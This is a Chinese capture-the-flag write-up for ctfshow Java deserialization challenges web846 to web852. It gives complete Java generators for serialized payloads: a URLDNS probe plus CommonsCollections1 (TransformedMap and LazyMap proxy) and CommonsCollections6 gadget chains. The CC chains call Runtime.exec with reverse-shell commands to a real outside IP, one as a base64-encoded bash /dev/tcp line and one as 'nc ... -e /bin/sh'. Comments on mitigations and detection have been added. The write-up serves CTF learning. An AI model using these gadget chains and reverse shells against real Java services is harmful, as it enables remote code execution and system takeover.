CTFSHOW-java反序列化

web846

ctfshow 会对你 POST 提交的 ctfshow 参数进行 base64 解码,
然后进行反序列化
构造出一次对当前题目地址的 DNS 查询即可获得 flag
package com.wea5e1;

import java.io.*;
import java.lang.reflect.Field;
import java.net.URL;
import java.util.Base64;
import java.util.HashMap;


/**
 * Generates the Base64 payload for web846: a serialized {@code HashMap} whose only key is a
 * {@code java.net.URL} pointing at the challenge host.
 *
 * Defender's view: {@code HashMap.readObject} recomputes every key's hash, and
 * {@code URL.hashCode} resolves the host name to do so, so the outbound DNS query happens on
 * whichever side deserializes these bytes (the write-up says the challenge base64-decodes the
 * POST parameter and deserializes it). That DNS lookup is the observable signal of the sink
 * being reached. An {@code ObjectInputFilter} that does not allow {@code java.net.URL}
 * (any allow-list based filter) stops this before {@code readObject} runs.
 */
public class ctfshow846 {
public static void main(String[] args) throws Exception {
// Raw-typed map; only one entry is ever stored.
HashMap h=new HashMap();
// Host that will be looked up; per the write-up this is the current challenge address.
URL url=new URL("https://b3f77a0b-169e-4e71-bf88-42040c3a87d7.challenge.ctf.show/");
// java.net.URL caches its hash in the private field "hashCode"; -1 means "not computed yet".
Class cls=Class.forName("java.net.URL");
Field f = cls.getDeclaredField("hashCode");
f.setAccessible(true);
// Pre-set a cached value so that put() below does not resolve the host on this machine ...
f.set(url,1);
h.put(url,1);
// ... then reset it to -1 so the hash (and with it the DNS lookup) is recomputed on deserialization.
f.set(url,-1);

ByteArrayOutputStream b = new ByteArrayOutputStream();
ObjectOutputStream oos = new ObjectOutputStream(b);
oos.writeObject(h);
// NOTE(review): the stream is never closed here, unlike the web847/848 listings; closing it is the conventional form.

String payload = Base64.getEncoder().encodeToString(b.toByteArray());
System.out.println(payload);
}
}

然后对 payload 做一次 URL 全编码就行了

web847

package org.example.CommonsCollections;

import org.apache.commons.collections.Transformer;
import org.apache.commons.collections.functors.ChainedTransformer;
import org.apache.commons.collections.functors.ConstantTransformer;
import org.apache.commons.collections.functors.InvokerTransformer;
import org.apache.commons.collections.map.TransformedMap;

import java.io.*;
import java.lang.annotation.Target;
import java.lang.reflect.Constructor;
import java.util.Base64;
import java.util.HashMap;
import java.util.Map;

/**
 * Generates the Base64 payload for web847 using the CommonsCollections1 gadget chain
 * (TransformedMap decorated with a ChainedTransformer, wrapped in an AnnotationInvocationHandler).
 *
 * Defender's view: this only fires if the deserializing side has commons-collections 3.x on its
 * classpath and runs a JDK whose {@code sun.reflect.annotation.AnnotationInvocationHandler.readObject}
 * still writes into the supplied map (older JDK 8 builds; the 8u71 change closed that path).
 * Upgrading to commons-collections 3.2.2, which refuses to deserialize {@code InvokerTransformer}
 * unless a system property opts in, or installing an {@code ObjectInputFilter} at the
 * {@code readObject} sink, breaks the chain. On the host, an unexpected child process of the JVM
 * (here {@code bash -c ...}) is the detection signal.
 */
public class show847 {
public static void main(String[] args) throws Exception {

// Each transformer's output is the input of the next; the chain ends in Runtime.exec(String).
Transformer[] transformers = new Transformer[]{
new ConstantTransformer(Runtime.class),
new InvokerTransformer("getMethod", new Class[]{String.class, Class[].class}, new Object[]{"getRuntime", null}),
new InvokerTransformer("invoke", new Class[]{Object.class, Object[].class}, new Object[]{null, null}),
// The command string handed to exec (author's note: the reverse-shell command goes here).
new InvokerTransformer("exec", new Class[]{String.class}, new Object[]{"bash -c {echo,L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwLzEwMS4yMDEuMTE5LjE1OC8yMzMzIDA+JjE}|{base64,-d}|{bash,-i}"})
};

ChainedTransformer chainedTransformer = new ChainedTransformer(transformers);

HashMap<Object, Object> map = new HashMap<>();
// The key must be "value", because the Target annotation declares a value() method.
map.put("value", "sometext");

// Only the value transformer is set (key transformer is null); the chain runs when a value is written through the decorator.
Map<Object, Object> transformedMap = TransformedMap.decorate(map, null, chainedTransformer);

// The (Class, Map) constructor is not public, hence the reflective lookup and setAccessible.
Class c = Class.forName("sun.reflect.annotation.AnnotationInvocationHandler");
Constructor AnnotationInvocationHandlerConstructor = c.getDeclaredConstructor(Class.class, Map.class);
AnnotationInvocationHandlerConstructor.setAccessible(true);

Object o = AnnotationInvocationHandlerConstructor.newInstance(Target.class, transformedMap);

ByteArrayOutputStream b = new ByteArrayOutputStream();
ObjectOutputStream oos = new ObjectOutputStream(b);
oos.writeObject(o);
oos.close();

String payload = Base64.getEncoder().encodeToString(b.toByteArray());
System.out.println("Payload 生成成功:");
System.out.println(payload);
}
}

用 CC1 的第一条链子直接打

web848

package org.example;

import org.apache.commons.collections.Transformer;
import org.apache.commons.collections.functors.ChainedTransformer;
import org.apache.commons.collections.functors.ConstantTransformer;
import org.apache.commons.collections.functors.InvokerTransformer;
import org.apache.commons.collections.map.LazyMap;

import java.io.*;
import java.lang.annotation.Retention;
import java.lang.reflect.Constructor;
import java.lang.reflect.InvocationHandler;
import java.lang.reflect.Proxy;
import java.util.Base64;
import java.util.HashMap;
import java.util.Map;

/**
 * Generates the Base64 payload for web848. Despite the class name, this is the LazyMap plus
 * dynamic-proxy variant of the CommonsCollections1 chain (the write-up calls it "CC1's other chain"),
 * not a CC11 payload.
 *
 * Defender's view: the preconditions are the same as for the TransformedMap variant — commons-collections
 * 3.x on the target classpath and a JDK whose AnnotationInvocationHandler.readObject still calls into the
 * supplied map (pre-8u71 JDK 8). commons-collections 3.2.2 (which blocks deserialization of
 * InvokerTransformer by default) or an {@code ObjectInputFilter} at the readObject sink stops it; an
 * unexpected {@code bash} child of the JVM is the host-level indicator.
 */
public class CommonsCollections11 {
public static void main(String[] args) throws Exception {
// Same Runtime.getRuntime().exec(String) chain as the web847 listing; only the trigger differs.
Transformer[] transformers = new Transformer[]{
new ConstantTransformer(Runtime.class),
new InvokerTransformer("getMethod", new Class[]{
String.class,
Class[].class}, new Object[]{"getRuntime",
new Class[0]}),
new InvokerTransformer("invoke", new Class[]{Object.class,
Object[].class}, new Object[]{null, new Object[0]
}),
new InvokerTransformer("exec", new Class[]{String.class},
new String[]{
"bash -c {echo,L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwLzEwMS4yMDEuMTE5LjE1OC8yMzMzIDA+JjE}|{base64,-d}|{bash,-i}"}),
};

Transformer transformerChain = new ChainedTransformer(transformers);
Map innerMap = new HashMap();

// LazyMap runs the factory on get() for a missing key; it is wrapped twice below.
Map outerMap = LazyMap.decorate(innerMap, transformerChain);
// The (Class, Map) constructor is not public, hence the reflective lookup and setAccessible.
Class clazz = Class.forName("sun.reflect.annotation.AnnotationInvocationHandler");
Constructor construct = clazz.getDeclaredConstructor(Class.class, Map.class);
construct.setAccessible(true);
// First handler holds the LazyMap; the proxy routes every Map call on it through that handler ...
InvocationHandler handler = (InvocationHandler) construct.newInstance(Retention.class, outerMap);
Map proxyMap = (Map) Proxy.newProxyInstance(Map.class.getClassLoader(), new Class[]{Map.class}, handler);
// ... and the second handler, the object actually serialized, holds the proxy as its map.
handler = (InvocationHandler) construct.newInstance(Retention.class, proxyMap);
ByteArrayOutputStream b = new ByteArrayOutputStream();
ObjectOutputStream oos = new ObjectOutputStream(b);
oos.writeObject(handler);
oos.close();

String payload = Base64.getEncoder().encodeToString(b.toByteArray());
System.out.println("Payload 生成成功:");
System.out.println(payload);
// Left-over local test helpers from the author; note the commented-out block also swallows main's closing brace,
// which is why the class ends with "}}".
/*serialize(handler);
unserialize("ser.bin");

}
public static void serialize(Object obj) throws IOException {
ObjectOutputStream oos = new ObjectOutputStream(new FileOutputStream("ser.bin"));
oos.writeObject(obj);
}

public static Object unserialize(String Filename) throws IOException, ClassNotFoundException {
ObjectInputStream ois = new ObjectInputStream(new FileInputStream(Filename));
Object obj = ois.readObject();
return obj;
}*/
}}

使用的是 CC1 的另一条链子,反弹 shell 直接打

web849 & web851 & web852

(本来是在看 851 的,因为会 CC6;没想到打这个就打通了)

package com.wea5e1;

import org.apache.commons.collections4.Transformer;
import org.apache.commons.collections4.functors.ChainedTransformer;
import org.apache.commons.collections4.functors.ConstantTransformer;
import org.apache.commons.collections4.functors.InvokerTransformer;
import org.apache.commons.collections4.keyvalue.TiedMapEntry;
import org.apache.commons.collections4.map.LazyMap;

import java.io.*;
import java.lang.reflect.Field;
import java.util.Base64;
import java.util.HashMap;
import java.util.Map;

/**
 * Generates the Base64 payload for web849/851/852 using a CommonsCollections6-style chain built on
 * commons-collections4 (the write-up notes that collections 4.0 is the version imported).
 *
 * Defender's view: the trigger is {@code HashMap.readObject} recomputing the hash of the
 * {@code TiedMapEntry} key, which calls {@code LazyMap.get} and therefore the factory chain. It does not
 * depend on AnnotationInvocationHandler, so patching the JDK alone does not close it; what does is an
 * {@code ObjectInputFilter} at the readObject sink or a commons-collections4 release (4.1 and later) in
 * which these functor classes are no longer serializable. An unexpected {@code nc} child process of the
 * JVM is the host-level indicator.
 */
public class CC_six_4 {
public static void main(String[] args) throws Exception{


// Same Runtime.getRuntime().exec(String) chain as the CC1 listings above.
Transformer[] transformers = new Transformer[]{
new ConstantTransformer(Runtime.class),
new InvokerTransformer("getMethod", new Class[]{String.class, Class[].class}, new Object[]{"getRuntime", null}),
new InvokerTransformer("invoke", new Class[]{Object.class, Object[].class}, new Object[]{null, null}),
new InvokerTransformer("exec", new Class[]{String.class}, new Object[]{"nc 101.201.119.158 2333 -e /bin/sh"})
};
ChainedTransformer chainedTransformer = new ChainedTransformer(transformers);

HashMap<Object, Object> map = new HashMap<>();
// Start with a harmless factory so that building the entry below does not run the chain on this machine.
Map<Object, Object> Outermap = LazyMap.lazyMap(map, new ConstantTransformer(1));
// TiedMapEntry.hashCode delegates to Outermap.get("test") — the call HashMap.readObject will make.
TiedMapEntry tiedMapEntry = new TiedMapEntry(Outermap, "test");

HashMap<Object, Object> map2 = new HashMap<>();
// put() already invoked hashCode once, so the LazyMap now holds "test" ...
map2.put(tiedMapEntry,"test1");
// ... remove it, otherwise get("test") would be a hit and the factory would not run on the receiving side.
Outermap.remove("test");

// Only now swap in the real chain; LazyMap has no setter for "factory", hence reflection.
Class c = LazyMap.class;
Field factoryField = c.getDeclaredField("factory");
factoryField.setAccessible(true);
factoryField.set(Outermap,chainedTransformer);

ByteArrayOutputStream b = new ByteArrayOutputStream();
ObjectOutputStream oos = new ObjectOutputStream(b);
oos.writeObject(map2);
// NOTE(review): the stream is never closed here, unlike the web847/848 listings; closing it is the conventional form.

String payload = Base64.getEncoder().encodeToString(b.toByteArray());
System.out.println(payload);

}
}

使用的是 CC6 的链子,反弹 shell 直接打;注意 commons-collections 4.0 要导入的是 org.apache.commons.collections4

其他的先埋个坑